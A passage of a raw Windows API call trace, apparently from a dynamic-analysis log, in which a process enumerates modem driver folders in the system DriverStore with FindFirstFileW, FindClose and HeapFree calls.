lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcommu.inf_amd64_neutral_83cc415156be45c8\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a45dbe1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b3bf24, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b3bf24, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.160] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.160] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcomp.inf_amd64_neutral_e5ca2f01ca47bddb\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a4f6162, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b62084, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b62084, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.161] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.161] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq.inf_amd64_neutral_fbc4a14a6a13d0c8\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3aa06f9e, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c3e9f0e, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c3e9f0e, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.162] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.162] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq2.inf_amd64_neutral_e9784021af1f5e24\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a5b4843, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b881e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b881e5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.162] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.162] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpv.inf_amd64_neutral_5667cca434e3a6b7\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a64cdc4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bae345, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bae345, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.163] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.163] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcrtix.inf_amd64_neutral_e91a5dc0655e200a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6e5346, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bd44a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bd44a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.163] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.163] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxhv6.inf_amd64_neutral_81ba64c5b6150dd3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b0515e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c363a89, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c363a89, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.165] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.166] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxpv6.inf_amd64_neutral_f62ac4bd04e653d0\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50c81f21, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c3d5eaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c3d5eaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.168] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.169] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.169] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm5.inf_amd64_neutral_0bb09f3e5a59f3a8\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a7c9b87, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c20766, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c20766, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.169] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.170] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm6.inf_amd64_neutral_b1db427ce3d2a1b4\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a8d4529, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c6ca26, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c6ca26, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.171] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.171] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdf56f.inf_amd64_neutral_26a79521b746fc31\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a992c0a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c92b87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c92b87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.171] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.171] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdgitn.inf_amd64_neutral_09132735f1063a47\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aa2b18c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cb8ce7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cb8ce7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.172] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.172] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdp2.inf_amd64_neutral_ab710894455d7b9a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aac370d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cdee47, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cdee47, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.172] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.172] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdsi.inf_amd64_neutral_e77f438012239042\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ac404cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67d2b108, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67d2b108, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.173] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.173] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdyna.inf_amd64_neutral_7e4d690d07ee94c1\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4adbd292, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67de97e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67de97e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.173] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.173] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeiger.inf_amd64_neutral_492d4e047d14bde9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ae7b974, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67e5bc0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67e5bc0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.174] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.174] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmelsa.inf_amd64_neutral_374f9d31af832d6b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4af86315, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ea7eca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ea7eca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.178] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.178] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric.inf_amd64_neutral_27c5b45728cc9ed0\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b090cb7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6817b8f0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6817b8f0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.179] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.179] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric2.inf_amd64_neutral_a0575ec9ce5c7de9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b129238, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681a1a50, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681a1a50, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.179] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.179] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmetech.inf_amd64_neutral_230358eeb58f0b3b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b20da7a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681c7bb0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681c7bb0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.180] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.180] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmfj2.inf_amd64_neutral_9c9eb67d406a1632\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b2cc15b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681edd10, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681edd10, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.180] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.180] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgatew.inf_amd64_neutral_84eee4cc19fd00dc\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b3d6afd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68213e71, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68213e71, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.181] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.181] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgcs.inf_amd64_neutral_aafcd45e4e890862\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b4bb33f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68260131, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68260131, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.181] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.181] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgen.inf_amd64_neutral_7a967d06d569b1e4\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b59fb81, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68286292, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68286292, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.182] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.182] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl001.inf_amd64_neutral_9209e816461a1a73\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47580a6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6610ccf4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6610ccf4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.182] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.182] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl002.inf_amd64_neutral_e204d4267d752eb7\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4768b40c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66158fb4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66158fb4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.183] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.183] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl003.inf_amd64_neutral_4c78da9e48068043\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4776fc4e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x661a5275, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x661a5275, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.183] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.183] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl004.inf_amd64_neutral_1874f16002601f78\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47e6dcfb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6642c9da, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6642c9da, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.184] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.184] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl005.inf_amd64_neutral_8b56291bfd2a4061\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48356a64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66857061, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66857061, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.184] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.184] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl006.inf_amd64_neutral_e5693eb731048022\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48487566, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x668a3322, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x668a3322, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.185] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.185] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl007.inf_amd64_neutral_935cd017fcb965ee\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485de1c9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6693b8a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6693b8a3, 